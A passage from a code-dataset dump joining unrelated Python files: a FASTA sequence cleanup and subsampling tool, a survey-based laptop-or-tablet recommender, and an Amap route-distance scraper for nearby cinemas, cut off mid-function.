colsComp:\r\n tags += line.rstrip().split(Cleanup.splitChar)[col]\r\n\r\n if tags in lineTags:\r\n removedLines.append(tags)\r\n # uncomment to print duplicates\r\n # print(line.rstrip().split(Cleanup.splitChar)[0])\r\n else:\r\n newLines.append(line)\r\n lineTags.append(tags)\r\n\r\n print(\"REMOVED DUP COUNT: \" + str(len(removedLines)) )\r\n return newLines\r\n\r\n # remove rows of low length\r\n def removeSparseRows(inputLines):\r\n # Remove length\r\n maxLen = 0\r\n removedLength = []\r\n newLines = []\r\n\r\n threshold = float(input(\"Percent under max length for which lines will be cut (enter .75 for 75%): \"))\r\n for line in inputLines:\r\n curMax = len(line.rstrip().split(Cleanup.splitChar)[-1].replace(\"-\",\"\").replace(\"n\",\"\"))\r\n if (curMax > maxLen):\r\n maxLen = curMax\r\n\r\n for line in inputLines:\r\n sequence = line.rstrip().split(Cleanup.splitChar)[-1].replace(\"-\",\"\").replace(\"n\",\"\")\r\n if len(sequence) < maxLen * threshold:\r\n removedLength.append(line)\r\n else:\r\n newLines.append(line)\r\n\r\n print(\"REMOVED LENGTH COUNT: \" + str(len(removedLength)))\r\n return newLines\r\n\r\n # remove columns with too few nucleotides\r\n def removeSparseCols(inputLines):\r\n # removed columns\r\n threshold = float(input(\"Percent under max length for which columns will be cut (enter .5 for 50%): \"))\r\n countColSize = {}\r\n removedColumns = []\r\n newLines = []\r\n numLines = len(inputLines)\r\n threshold = threshold * numLines\r\n\r\n # Loop through every line, count column sizes\r\n for line in inputLines:\r\n for colNum, char in enumerate(line.rstrip().split(Cleanup.splitChar)[-1]):\r\n if not(colNum in countColSize.keys()):\r\n countColSize[colNum] = 0\r\n if not(char == \"-\" or char == \"n\"):\r\n countColSize[colNum] += 1\r\n\r\n validCols = []\r\n for key in countColSize.keys():\r\n if not(countColSize[key] < threshold):\r\n validCols.append(key)\r\n\r\n # Loop through every line, remove columns under threshold\r\n for line in inputLines:\r\n line = line.rstrip()\r\n tags = Cleanup.splitChar.join(line.split(Cleanup.splitChar)[:-1])\r\n sequence = line.split(Cleanup.splitChar)[-1]\r\n validChars = [sequence[x] for x in validCols]\r\n newLines.append(tags + Cleanup.splitChar\r\n + \"\".join(list(map(str, validChars))))\r\n\r\n removedCount = max(countColSize.keys()) - len(validCols) + 1\r\n print(\"REMOVED COLUMNS COUNT: \" + str(removedCount))\r\n return newLines\r\n\r\n # Apply all cleanup functions\r\n def start():\r\n print(\"*** Starting Fasta Clean ***\")\r\n print(\"** Remove duplicate sequences, remove sparse columns, and remove sparse sequences **\")\r\n\r\n # Read input\r\n (inputLines, Cleanup.splitChar) = inputFile(\"input\")\r\n inputLines = formatInput(inputLines, Cleanup.splitChar)\r\n print(\"INITIAL COUNT: \" + str(len(inputLines)))\r\n\r\n # remove sparse cols, sparse rows, and duplicates\r\n outputLines = Cleanup.removeSparseCols(inputLines)\r\n outputLines = Cleanup.removeSparseRows(outputLines)\r\n outputLines = Cleanup.removeDuplicates(outputLines)\r\n\r\n # format output\r\n Cleanup.outputLines = outputToFas(outputLines, Cleanup.splitChar)\r\n\r\n # Print good lines to output file\r\n print('\\a')\r\n outputFile(Cleanup.outputLines)\r\n\r\n\r\n# Change .fas to .csv or .csv to .fas\r\nclass Extension:\r\n\r\n def toCSV(inputLines):\r\n outputLines = []\r\n splitChar = \",\"\r\n # Reformat lines\r\n curSequence = inputLines[0].rstrip().replace(\":\",\"\").replace(\"(\",\"_\").replace(\")\",\"_\").replace(\" \",\"_\").replace(\"\\'\",\"\").replace(\"|\",\",\")\r\n count = 0\r\n for line in inputLines[1:]:\r\n if (\">\" in line):\r\n outputLines.append(curSequence + \"\\n\")\r\n curSequence = line.rstrip().replace(\":\",\"\").replace(\"(\",\"_\").replace(\")\",\"_\").replace(\" \",\"_\").replace(\"\\'\",\"\").replace(\"|\",\",\")\r\n count = 0\r\n else:\r\n if (count == 0):\r\n if (curSequence[-1] == \",\"):\r\n curSequence = curSequence\r\n else:\r\n curSequence = curSequence + splitChar\r\n curSequence = curSequence + line.rstrip()\r\n count += 1\r\n # Add final line, not added by for loop\r\n outputLines.append(curSequence)\r\n return outputLines\r\n\r\n def toFas(inputLines):\r\n outputLines = []\r\n splitChar = \",\"\r\n for line in inputLines:\r\n tags = \"|\".join(line.rstrip().split(splitChar)[:-1])\r\n sequence = line.rstrip().split(splitChar)[-1].rstrip()\r\n outputLines.append(tags + \"\\n\")\r\n count = 0\r\n chunk = \"\"\r\n for char in sequence:\r\n count += 1\r\n chunk = chunk + char\r\n if count == 60:\r\n outputLines.append(chunk + \"\\n\")\r\n chunk = \"\"\r\n count = 0\r\n if len(chunk) != 0:\r\n outputLines.append(chunk + \"\\n\")\r\n return outputLines\r\n\r\n def start():\r\n print(\"*** Starting File Type Switcher ***\")\r\n print(\"** Enter .csv file to change format to .fas, enter .fas file to change format to .csv **\")\r\n\r\n (inputLines, splitChar) = inputFile(\"input\")\r\n if (splitChar == \"|\"):\r\n outputLines = Extension.toCSV(inputLines)\r\n elif (splitChar == \",\"):\r\n outputLines = Extension.toFas(inputLines)\r\n else:\r\n print(\"DEBUG: impossible, file must be .fas or .csv\")\r\n quit()\r\n\r\n outputFile(outputLines)\r\n\r\n\r\nclass Tag:\r\n\r\n def start():\r\n print(\"*** Starting Modify Tags ***\")\r\n print(\"** Input a CSV, first column will be matched to a fasta sequence tag **\")\r\n print(\"** Second column will be added to each matching sequence **\")\r\n print(\"** Input csv should have two columns: **\")\r\n\r\n (inputLines, splitChar) = inputFile(\"sequences fasta\")\r\n inputLines = formatInput(inputLines, Cleanup.splitChar)\r\n\r\n matchLines = inputFile(\"tags csv\")[0]\r\n\r\n # Change tags\r\n matchTagNum = int(input(\"Which number tag is being matched from the sequences (starting at 0): \"))\r\n matchDict = {}\r\n outputLines = []\r\n\r\n for line in matchLines:\r\n line = line.rstrip().split(\",\")\r\n try:\r\n matchDict[line[0]] = line[1]\r\n except Exception:\r\n print(\"Input csv must have two columns\")\r\n quit()\r\n\r\n for line in inputLines:\r\n line = line.rstrip()\r\n tags = line.split(splitChar)\r\n toChange = str(tags[matchTagNum])\r\n if (toChange in matchDict.keys()):\r\n toAdd = matchDict[toChange]\r\n tags[matchTagNum] = toChange + splitChar + toAdd\r\n line = splitChar.join(tags)\r\n outputLines.append(line)\r\n else:\r\n print(\"Missing key for: \" + tags[0] + \" (key is \" + toChange + \")\")\r\n\r\n outputLines = outputToFas(outputLines, splitChar)\r\n outputFile(outputLines)\r\n\r\nclass Genome:\r\n\r\n def start():\r\n print(\"*** Starting genome data set ***\")\r\n print(\"** Input any number of fasta files **\")\r\n print(\"** Enter the tag number for comparison\")\r\n print(\"** Output will be a csv with each tag in the inputted number spot that is in a sequence in every file ***\")\r\n\r\n try:\r\n matchTag = int(input(\"Which tag number should be compared (starting at 0): \"))\r\n except Exception:\r\n print(\"Tag must be an integer\")\r\n quit()\r\n\r\n (inputLines, splitChar) = inputFile(\"input\")\r\n inputLines = formatInput(inputLines, splitChar)\r\n tagList = []\r\n\r\n for line in inputLines:\r\n tag = line.rstrip().split(splitChar)[matchTag]\r\n tagList.append(tag)\r\n\r\n cont = input(\"Add another file (y/n): \")\r\n\r\n while (cont == \"y\"):\r\n (tempLines, tempSplitChar) = inputFile(\"input\")\r\n tempLines = formatInput(tempLines, tempSplitChar)\r\n tempTagList = []\r\n validTags = []\r\n\r\n for line in tempLines:\r\n tag = line.rstrip().split(splitChar)[matchTag]\r\n tempTagList.append(tag)\r\n for tag in tagList:\r\n if tag in tempTagList and not(tag in validTags):\r\n validTags.append(tag)\r\n\r\n tagList = validTags\r\n\r\n cont = input(\"Add another file (y/n): \")\r\n\r\n outputFile(\",genome\\n\".join(tagList) + \",genome\")\r\n\r\nclass Subsample:\r\n\r\n def start():\r\n print(\"*** Starting Sequence Subsampler Application ***\")\r\n print(\"** Check readme for use instructions and examples **\")\r\n\r\n # todo move these\r\n #print(\"|** NOMENCLATURE: tags are larger classifications, subtags are the values within the tag (Ex. Location is a tag, Canada is a subtag)\")\r\n #print(\"|** For each of the following inputs the tags and subtags are inputed by the user\")\r\n #print(\"|* ALL tags means every ouput sequence must have these tags (Ex. Every sequence must be from Canada )\")\r\n #print(\"|* OR tags means every output sequence must be in a single OR tag group, each of which has a specified max size (Ex. 5 sequences from every year)\")\r\n #print(\"|* MIN tags means if possible there will be minimum number of sequences in each MIN tag group without conflicting with ALL or OR (Ex. 1 sequence per year for each host type)\")\r\n #print(\"|* NOT tags means no output sequence can have these tags (Ex. No sequences with Canada as location)\")\r\n\r\n\r\n # Find file to be subsampled (must be a csv with tags in the first row)\r\n pathname = input(\"Filepath to be subsampled (must be .csv with a head in the first row): \")\r\n try:\r\n inputFile = open(pathname, \"r\")\r\n except Exception:\r\n print(\"File does not exist\")\r\n quit()\r\n\r\n inputLines = inputFile.readlines()\r\n inputFile.close()\r\n\r\n # Stores all tags in first line of file\r\n allTags = [];\r\n for count,tag in enumerate(inputLines[0].rstrip().split(\",\")):\r\n allTags.append((count,tag))\r\n\r\n # Number of each tag\r\n tagNums = [x[0] for x in allTags]\r\n tagNames = [x[1] for x in allTags]\r\n print(\"TAGS FOUND: \")\r\n print(*tagNames, sep=\"\\n\")\r\n\r\n # Remove tag line and randomize input so output will be random\r\n header = inputLines[0]\r\n inputLines = inputLines[1:]\r\n random.shuffle(inputLines)\r\n\r\n # Ask user for which tags they wish to use\r\n tagTypes = input(\"Which subsampling types would you like (of ALL,OR,MIN,NOT)(comma-separated): \").split(\",\")\r\n\r\n # Choose tags which every output sequences must have\r\n if (\"ALL\" in tagTypes):\r\n andTags = input(\"ALL tags (subtags choosen after)(comma-separated): \").split(\",\")\r\n if len([x for x in andTags if not(x in tagNames)]) > 0:\r\n print(\"One of those tags is not valid\")\r\n quit()\r\n else:\r\n andTags = []\r\n\r\n\r\n andTagNums = [x[0] for x in allTags if x[1] in andTags]\r\n andSubTags = {} # A dictionary mapping tags to the specified subtags\r\n # No option for all because that is equal to leaving out the tag\r\n for curTag in andTags:\r\n if curTag == \"Date\" or curTag == \"date\":\r\n try:\r\n startDate = [int(x) for x in input(\"Enter start date (year-month-day): \").split(\"-\")]\r\n endDate = [int(x) for x in input(\"Enter end date (year-month-day): \").split(\"-\")]\r\n except Exception:\r\n print(\"Date must be year-month-day\")\r\n quit()\r\n else:\r\n curInput = input(\"Subtags of \" + curTag + \" (comma-separated): \")\r\n andSubTags[curTag] = curInput.split(\",\")\r\n\r\n # Choose tags for which each all outputs must have one of the subtags\r\n # Will later choose the maximum number each group of subtags can have\r\n if (\"OR\" in tagTypes):\r\n orTags = input(\"OR tags (subtags choosen after)(comma-separated): \").split(\",\")\r\n if len([x for x in orTags if not(x in tagNames)]) > 0:\r\n print(\"One of those tags is not valid\")\r\n quit()\r\n else:\r\n orTags = []\r\n\r\n orTagNums = [x[0] for x in allTags if x[1] in orTags]\r\n orSubTags = {}\r\n for tag in orTags:\r\n if tag == \"Date\" or tag == \"date\":\r\n orDateType = input(\"Date grouped by year (type year) or month (type month): \")\r\n if not(orDateType == \"month\" or orDateType == \"year\"):\r\n print(\"Invalid date type, script will no longer function properly\")\r\n else:\r\n orSubTags[tag] = input(\"Subtags of \" + tag + \" (comma-separated or type ALL): \").split(\",\")\r\n\r\n\r\n # Choose the maximum number of sequences each group can have\r\n # Ex: 5 tags from Canada and 5 tags from UnitedStates\r\n if (\"OR\" in tagTypes):\r\n maxNumSequences = input(\"Number per OR group: \")\r\n try:\r\n temp = int(maxNumSequences)\r\n except Exception:\r\n print(\"Must be an integer\")\r\n quit()\r\n\r\n # Choose tags for which each all outputs must have one of the subtags\r\n # Will later choose the maximum number each group of subtags can have\r\n if (\"OR\" in tagTypes and \"MIN\" in tagTypes):\r\n minTags = input(\"MIN tags (subtags choosen after)(comma-separated): \").split(\",\")\r\n else:\r\n minTags = []\r\n\r\n minTagNums = [x[0] for x in allTags if x[1] in minTags]\r\n minSubTags = {}\r\n for tag in minTags:\r\n if tag == \"Date\" or tag == \"date\":\r\n minDateType = input(\"Date grouped by year (type year) or month (type month): \")\r\n if not(minDateType == \"month\" or minDateType == \"year\"):\r\n print(\"Invalid date type, script will no longer function properly\")\r\n quit()\r\n else:\r\n minSubTags[tag] = input(\"Subtags of \" + tag + \" (comma-separated or type ALL): \").split(\",\")\r\n\r\n # Choose the minimum number of sequences each group can have\r\n if (\"OR\" in tagTypes and \"MIN\" in tagTypes):\r\n minNumSequences = input(\"Number per MIN group: \")\r\n try:\r\n temp = int(minNumSequences)\r\n except Exception:\r\n print(\"Must be an integer\")\r\n quit()\r\n print(\"NUMBER CHOOSEN: \" + minNumSequences)\r\n\r\n\r\n # Choose tags which every no output sequences can have\r\n if (\"NOT\" in tagTypes):\r\n notTags = input(\"NOT tags (subtags choosen after)(comma-separated): \").split(\",\")\r\n if len([x for x in notTags if not(x in tagNames)]) > 0:\r\n print(\"One of those tags is not valid\")\r\n quit()\r\n else:\r\n notTags = []\r\n\r\n\r\n notTagNums = [x[0] for x in allTags if x[1] in notTags]\r\n notSubTags = {} # A dictionary mapping tags to the specified subtags\r\n # No option for all because that is equal to leaving out the tag\r\n for curTag in notTags:\r\n if curTag == \"Date\" or curTag ==\"date\":\r\n print(\"No support for date not tags\")\r\n else:\r\n curInput = input(\"Subtags of \" + curTag + \" (comma-separated): \")\r\n notSubTags[curTag] = curInput.split(\",\")\r\n\r\n # Dictionary mapping subtags to a count of how many choosen with that tag\r\n # Used to ensure proper number of each orTag\r\n orSubTagDict = {}\r\n minSubTagDict = {}\r\n\r\n # List that will contain every output line\r\n validLines = [];\r\n\r\n # Loop through every line\r\n for line in inputLines:\r\n # Strip special character such as \\n from end of the line\r\n line = line.rstrip()\r\n lineTags = line.split(\",\")\r\n\r\n # Consider each line to be valid output until proven otherwise\r\n # Innocent until proven guilty\r\n valid = True\r\n\r\n # Key which combines different tags for groups\r\n # For example canada2018, unitedstates2018, canada2019\r\n orFullTag = \"\"\r\n # Used for the minimum groups\r\n minFullTag = \"\"\r\n minValid = True\r\n\r\n # Loop through each subtag of the line\r\n for tagNum, tag in enumerate(lineTags):\r\n\r\n # If tag was choosen as notTag check that the subTag matches\r\n if tagNum in notTagNums:\r\n # Make sure subTag was one of input, otherwise it is not valid output\r\n possibleSubTags = notSubTags[allTags[tagNum][1]]\r\n if (tag in possibleSubTags):\r\n valid = False\r\n\r\n # If tag was choosen as andTag check that the subTag matches\r\n if tagNum in andTagNums:\r\n\r\n # If date do menial string manipulation\r\n if (tagNames[tagNum] == \"Date\" or tagNames[tagNum] == \"date\"):\r\n curDate = tag.split(\"-\")\r\n for i, x in enumerate(curDate):\r\n if (x == ''):\r\n curDate[i] = -1\r\n else:\r\n try:\r\n curDate[i] = int(x)\r\n except Exception:\r\n print(\"ERROR: a entry in the date column is not yyyy-mm-dd, it is: \" + x)\r\n quit()\r\n\r\n correctYear = (curDate[0] >= startDate[0] and curDate[0] <= endDate[0])\r\n\r\n if not(correctYear):\r\n valid = False\r\n elif (correctYear and not(curDate[0] > startDate[0])):\r\n #if current year is the start year\r\n if (curDate[1] == -1):\r\n valid = False\r\n elif (curDate[1] == startDate[1]):\r\n if (curDate[2] == -1):\r\n valid = False\r\n elif not(curDate[2] >= startDate[2]):\r\n valid = False\r\n elif not(curDate[1] > startDate[1]):\r\n valid = False\r\n\r\n elif (correctYear and not(curDate[0] < endDate[0])):\r\n #if current year is the end year\r\n if (curDate[1] == -1):\r\n valid = False\r\n elif (curDate[1] == endDate[1]):\r\n if (curDate[2] == -1):\r\n valid = False\r\n elif not(curDate[2] <= endDate[2]):\r\n valid = False\r\n elif not(curDate[1] < endDate[1]):\r\n valid = False\r\n\r\n else:\r\n # Any tag but dateTag\r\n # Make sure subTag was one of input, otherwise it is not valid output\r\n possibleSubTags = andSubTags[allTags[tagNum][1]]\r\n if not(tag in possibleSubTags):\r\n valid = False\r\n\r\n # If inValid ignore so not added to orSubTagDict\r\n if not(valid):\r\n break\r\n\r\n # If tag was choosen as orTag\r\n if tagNum in orTagNums:\r\n if (tagNames[tagNum] == \"Date\" or tagNames[tagNum] == \"date\"):\r\n curDate = tag.split(\"-\")\r\n for i, x in enumerate(curDate):\r\n if (x == ''):\r\n curDate[i] = -1\r\n else:\r\n curDate[i] = int(x)\r\n dateTag = curDate[0]*100\r\n if (orDateType == \"month\"):\r\n dateTag += curDate[1]\r\n\r\n orFullTag = orFullTag + str(dateTag)\r\n else:\r\n # If tag is not date find possible subTags\r\n possibleSubTags = orSubTags[allTags[tagNum][1]]\r\n if (\"ALL\" in possibleSubTags or tag in possibleSubTags):\r\n orFullTag = orFullTag + tag\r\n else:\r\n valid = False\r\n\r\n # If tag was choosen as a minTag\r\n if tagNum in minTagNums:\r\n if (tagNames[tagNum] == \"Date\" or tagNames[tagNum] == \"date\"):\r\n curDate = tag.split(\"-\")\r\n for i, x in enumerate(curDate):\r\n if (x == ''):\r\n curDate[i] = -1\r\n else:\r\n curDate[i] = int(x)\r\n dateTag = curDate[0]*100\r\n if (minDateType == \"month\"):\r\n dateTag += curDate[1]\r\n\r\n minFullTag = minFullTag + str(dateTag)\r\n else:\r\n # If tag is not date find possible subTags\r\n possibleSubTags = minSubTags[allTags[tagNum][1]]\r\n if (\"ALL\" in possibleSubTags or tag in possibleSubTags):\r\n minFullTag = minFullTag + tag\r\n else:\r\n minValid = False\r\n\r\n if valid and minValid and not(minFullTag == \"\"):\r\n if not(minFullTag in minSubTagDict.keys()):\r\n minSubTagDict[minFullTag] = []\r\n if len(minSubTagDict[minFullTag]) < int(minNumSequences):\r\n minSubTagDict[minFullTag].append(line) #TODO: is this necessary?\r\n # instead always add this line, only remove lines when they are greater than minsubtagdict length\r\n else:\r\n minValid = False\r\n\r\n\r\n if valid and not(orFullTag == \"\") and not(orFullTag in orSubTagDict.keys()):\r\n orSubTagDict[orFullTag] = [line]\r\n elif valid and not(orFullTag == \"\") and (len(orSubTagDict[orFullTag]) < int(maxNumSequences)):\r\n orSubTagDict[orFullTag].append(line)\r\n else:\r\n if valid and minValid and not(minFullTag == \"\"):\r\n # remove a line from the same orGroup as the minNumSequences\r\n removed = False\r\n for curToRemove in orSubTagDict[orFullTag]:\r\n # Only want to remove\r\n if not(curToRemove in [v for sublist in minSubTagDict.values() for v in sublist]):\r\n validLines.remove(curToRemove)\r\n orSubTagDict[orFullTag].remove(curToRemove)\r\n orSubTagDict[orFullTag].append(line)\r\n removed = True\r\n break\r\n if not(removed):\r\n minSubTagDict[minFullTag].remove(line)\r\n valid = False\r\n else:\r\n if not(minFullTag == \"\" and orFullTag ==\"\"):\r\n valid = False\r\n\r\n if valid:\r\n validLines.append(line)\r\n\r\n # Resort lines after randomization\r\n validLines.sort()\r\n\r\n print(str(len(validLines)) + \" SEQUENCES IN SUBSAMPLE \")\r\n\r\n # Write each sequence to the output file\r\n pathname = input(\"Filepath for output (recommended to be csv)(will create a new file if none exist): \")\r\n outputFile = open(pathname, \"w\")\r\n # Uncomment for output to contain header\r\n # outputFile.write(header)\r\n for line in validLines:\r\n outputFile.write(line + \"\\n\")\r\n inputFile.close()\r\n outputFile.close()\r\n\r\n # Write meta data to a File\r\n outputFile = open(\".metadata.csv\", \"w\")\r\n outputFile.write(\"Key,Size,Elements \\n\")\r\n outputFile.write(\"--- OR GROUPS --- \\n\")\r\n for orKey in orSubTagDict.keys():\r\n outputFile.write(str(orKey) + \",\" + str(len(orSubTagDict[orKey])) + \",\" + str(orSubTagDict[orKey]) + \"\\n\")\r\n outputFile.write(\"--- MIN GROUPS --- \\n\")\r\n for minKey in minSubTagDict.keys():\r\n outputFile.write(str(minKey) + \",\" + str(len(minSubTagDict[minKey])) + \",\" + str(minSubTagDict[minKey]) + \"\\n\")\r\n\r\n outputFile.close()\r\n\r\n\r\ndef start():\r\n print(\"---Starting Fasta Modifcation Tool---\\n\")\r\n loop = \"y\"\r\n\r\n while loop == \"y\":\r\n operation = input(\"What operation (subsample,clean,tag,extension,review,genome): \")\r\n if operation == \"clean\":\r\n Cleanup.start()\r\n elif operation == \"extension\":\r\n Extension.start()\r\n elif operation == \"tag\":\r\n Tag.start()\r\n elif operation == \"subsample\":\r\n Subsample.start()\r\n elif operation == \"review\":\r\n Review.start()\r\n elif operation == \"genome\":\r\n Genome.start()\r\n else:\r\n print(\"Invalid operation\")\r\n print(\"\\n---Operation Done---\")\r\n loop = input(\"Perform another operation (y/n): \")\r\n print(\"\") # equivalent of \"\\n\" after input\r\n quit_success()\r\n\r\n\r\n# Begin script\r\nstart()\r\n","sub_path":"module4/Supporting Materials/fastatool.py","file_name":"fastatool.py","file_ext":"py","file_size_in_byte":35221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229289031","text":"import pandas as pd\nimport random\ncol_list = [\"attribute\",\"value\",\"laptop\",\"tablet\"]\ndata = pd.read_csv(r'D:\\Worksapce\\VSWorksapce\\prob_data.csv')\n \nclass mymodel:\n #gender [0]\n # faculty[1]\n # price[2]\n #purpose1[3]\n # purpose2[4]\n # purpose3[5]\n #freaquency[6]\n \n def __init__(self, selected):\n self.selected=selected\n self.faculty_num=-1\n self.price_num=-1\n self.purpose1_num=-1\n self.purpose2_num=-1\n self.purpose3_num=-1\n self.freaquency_num=-1\n self.gender_num=-1\n \n \n \n def set_faculty(self,selected):\n if self.selected[1] == \"ครุศาสตร์อุตสาหกรรมและเทคโนโลยี\":\n self.faculty_num=0\n elif self.selected[1]== \"บริหารธุรกิจ\":\n self.faculty_num=1\n elif self.selected[1] == \"วิทยาศาสตร์\":\n self.faculty_num=2\n elif self.selected[1] == \"วิศวกรรมศาสตร์\":\n self.faculty_num=3\n elif self.selected[1] == \"ศิลปศาสตร์\":\n self.faculty_num=4\n elif self.selected[1] == \"สถาปัตยกรรมศาสตร์\":\n self.faculty_num=5\n elif self.selected[1] == \"อุตสาหกรรมอาหาร\":\n self.faculty_num=6\n elif self.selected[1] == \"เทคโนโลยีการเกษตร\":\n self.faculty_num=7\n elif self.selected[1] == \"เทคโนโลยีสารสนเทศ\":\n self.faculty_num=8\n elif self.selected[1] == \"วิทยาลัยนวัตกรรมการผลิตขั้นสูง\":\n self.faculty_num=9\n elif self.selected[1] == \"วิทยาลัยนาโนเทคโนโลยีพระจอมเกล้าลาดกระบ���ง\":\n self.faculty_num=10\n elif self.selected[1] == \"วิทยาลัยวิศวกรรมสังคีต\":\n self.faculty_num=11\n return self.faculty_num\n \n def set_price(self,selected): \n if self.selected[2] == \"10,001 - 15,000 บาท\":\n self.price_num=0\n elif self.selected[2]== \"15,001 - 20,000 บาท\":\n self.price_num=1\n elif self.selected[2] == \"20,001 - 25,000 บาท\":\n self.price_num=2\n elif self.selected[2] == \"25,001 - 30,000 บาท\":\n self.price_num=3\n elif self.selected[2]== \"5,001 - 10,000 บาท\":\n self.price_num=4\n elif self.selected[2] == \"น้อยกว่า 5,000 บาท\":\n self.price_num=5\n elif self.selected[2] == \"มากกว่า 30,000 บาท\":\n self.price_num=6\n return self.price_num\n \n def set_purpose1(self,selected): \n if self.selected[3] == \"การศึกษา\":\n self.purpose1_num=0\n elif self.selected[3]== \"ตัดต่อวิดีโอ\":\n self.purpose1_num=1\n elif self.selected[3] == \"วาดรูป\":\n self.purpose1_num=2\n elif self.selected[3] == \"สื่อบันเทิง (สตรีมมิ่งเพลงและวิดีโอต่าง ๆ)\":\n self.purpose1_num=3\n elif self.selected[3]== \"เขียนแบบ , ออกแบบแผนผังต่าง ๆ\":\n self.purpose1_num=4\n elif self.selected[3] == \"เขียนโปรแกรม\":\n self.purpose1_num=5\n elif self.selected[3] == \"เล่นเกม\":\n self.purpose1_num=6\n return self.purpose1_num\n \n def set_purpose2(self,selected): \n if self.selected[4] == \"การศึกษา\":\n self.purpose2_num=0\n elif self.selected[4]== \"ตัดต่อวิดีโอ\":\n self.purpose2_num=1\n elif self.selected[4] == \"ทำเพลง\":\n self.purpose2_num=2\n elif self.selected[4] == \"วาดรูป\":\n self.purpose2_num=3\n elif self.selected[4]== \"สื่อบันเทิง (สตรีมมิ่งเพลงและวิดีโอต่าง ๆ)\":\n self.purpose2_num=4\n elif self.selected[4] == \"เขียนแบบ , ออกแบบแผนผังต่าง ๆ\":\n self.purpose2_num=5\n elif self.selected[4] == \"เขียนโปรแกรม\":\n self.purpose2_num=6\n elif self.selected[4] == \"เล่นเกม\":\n self.purpose2_num=7\n return self.purpose2_num\n \n def set_purpose3(self,selected): \n if self.selected[5] == \"การศึกษา\":\n self.purpose3_num=0\n elif self.selected[5]== \"ตัดต่อวิดีโอ\":\n self.purpose3_num=1\n elif self.selected[5] == \"ทำเพลง\":\n self.purpose3_num=2\n elif self.selected[5] == \"วาดรูป\":\n self.purpose3_num=3\n elif self.selected[5]== \"สื่อบันเทิง (สตรีมมิ่งเพลงและวิดีโอต่าง ๆ)\":\n self.purpose3_num=4\n elif self.selected[5] == \"เขียนแบบ , ออกแบบแผนผังต่าง ๆ\":\n self.purpose3_num=5\n elif self.selected[5] == \"เขียนโปรแกรม\":\n self.purpose3_num=6\n elif self.selected[5] == \"เล่นเกม\":\n self.purpose3_num=7\n return self.purpose3_num\n \n def set_freaquency(self,selected): \n if self.selected[6] == \"1 - 2 วัน\":\n self.freaquency_num=0\n elif self.selected[6]== \"3 - 5 วัน\":\n self.freaquency_num=1\n elif self.selected[6] == \"ทุกวัน\":\n self.freaquency_num=2\n elif self.selected[6] == \"ไม่พกพาเลย\":\n self.freaquency_num=3\n return self.freaquency_num\n \n def set_gender(self,selected): \n if self.selected[0] == \"LGBTQ+\":\n self.gender_num=0\n elif self.selected[0]== \"ชาย\":\n self.gender_num=1\n elif self.selected[0] == \"หญิง\":\n self.gender_num=2 \n return self.gender_num\n \n \n def calculate(self):\n self.faculty_num=self.set_faculty(self.selected)\n self.price_num=self.set_price(self.selected)\n self.purpose1_num=self.set_purpose1(self.selected)\n self.purpose2_num=self.set_purpose2(self.selected)\n self.purpose3_num=self.set_purpose3(self.selected)\n self.freaquency_num=self.set_freaquency(self.selected)\n self.gender_num=self.set_gender(self.selected)\n self.ans_list = [self.faculty_num,self.price_num,self.purpose1_num,self.purpose2_num,\n self.purpose3_num,self.freaquency_num,self.gender_num]\n \n #Group data to calculate \n self.att_list = [\"faculty\",\"price\",\"purpose1\",\"purpose2\",\"purpose3\",\"freaquency\",\"gender\"]\n self.table_all= []\n self.i=0\n for self.var in self.att_list :\n self.table_all.append(self.var)\n self.table_all[self.i] = data.groupby(['attribute']).get_group(self.var)\n self.i=self.i+1\n \n #calculate\n \n self.laptop = []\n self.tablet = []\n \n for self.j in range(len(self.ans_list)) :\n self.temp_value = self.table_all[self.j][(self.table_all[self.j]['value']==self.ans_list[self.j])]\n self.temp_value = self.temp_value.iloc[0]\n self.laptop.append(self.temp_value['laptop'])\n self.tablet.append(self.temp_value['tablet'])\n \n self.sum_laptop=1\n self.sum_tablet=1 \n for self.k in range(len(self.laptop)) :\n print(self.laptop[self.k])\n print(self.tablet[self.k])\n self.sum_laptop=self.sum_laptop*self.laptop[self.k]\n self.sum_tablet=self.sum_tablet*self.tablet[self.k]\n \n print (self.sum_laptop)\n print (self.sum_tablet) \n #send final answer\n self.final_ans=-1\n if(self.sum_laptop>self.sum_tablet) :\n self.final_ans=0#laptop\n elif (self.sum_laptop')\n key = re.findall(pattern, res.text)[0]\n\n params = {\n 'usepoiquery': 'true',\n 'coor_need': 'true',\n 'rendertemplate': '1',\n 'invoker': 'plan',\n 'engine_version': '3',\n 'start_types': '1',\n 'end_types': '1',\n 'viapoint_types': '1',\n 'policy2': '1',\n 'fromX': start_lnglat[0],\n 'fromY': start_lnglat[1],\n 'start_poiid': start_location[1],\n 'start_poitype': start_location[2],\n 'start_poiname': start_location[3],\n 'toX': end_lnglat[0],\n 'toY': end_lnglat[1],\n 'end_poiid': end_location[1],\n 'end_poitype': end_location[2],\n 'end_poiname': end_location[3],\n 'key': key,\n 'callback': 'jsonp_990327_'\n }\n url = 'https://www.amap.com/service/autoNavigat?'\n res = requests.get(url, params=params)\n dic = json.loads(\n res.text.replace(\"/**/ typeof jsonp_990327_ === 'function' && jsonp_990327_(\", \"\").replace(\");\", \"\"))\n\n return dic['data']['distance'].split(',')[0]\n\n\ndef get_location(location):\n wd = {\n 'words': location\n }\n url = 'https://www.amap.com/service/poiTipslite?&city=330100&type=dir&' + urllib.parse.urlencode(wd)\n # print(url)\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\"\n }\n response = requests.get(url, headers=headers)\n dic = json.loads(response.text)\n # print(dic)\n return [dic['data']['tip_list'][0]['tip']['lnglat'], dic['data']['tip_list'][0]['tip']['id'],\n dic['data']['tip_list'][0]['tip']['category'], dic['data']['tip_list'][0]['tip']['name']]\n\n\ndef calculate_distance(cinema_pk, ori=\"浙江理工大学\", dis=\"杭州电子科技大学\"):\n \"\"\"\n\n :param cinema_pk: 电影院的pk\n :param ori: 起点\n :param dis: 终点\n :return:\n \"\"\"\n global result\n try:\n start_location = get_location(ori)\n end_location = get_location(dis)\n distance = float(getDistance(start_location, end_location))\n print(ori, dis, start_location, end_location, distance)\n if distance < dis_threshold:\n result.append([cinema_pk, distance]) # 保存小于距离阈值的电影院pk和距离\n except Exception as e:\n print(ori, dis, e)\n\n\ndef get_all_cinemas(city=\"杭州\", district=\"江干\", location=\"浙江财经大学\"):\n global result\n result = []\n query = CinemaUrl.objects.filter(city__contains=city).filter(district__contains=district) # 获取CinemaUrl对象\n ths = []\n for cinema in query:\n original_cinema_location = cinema.location\n\n new_cinema_location = 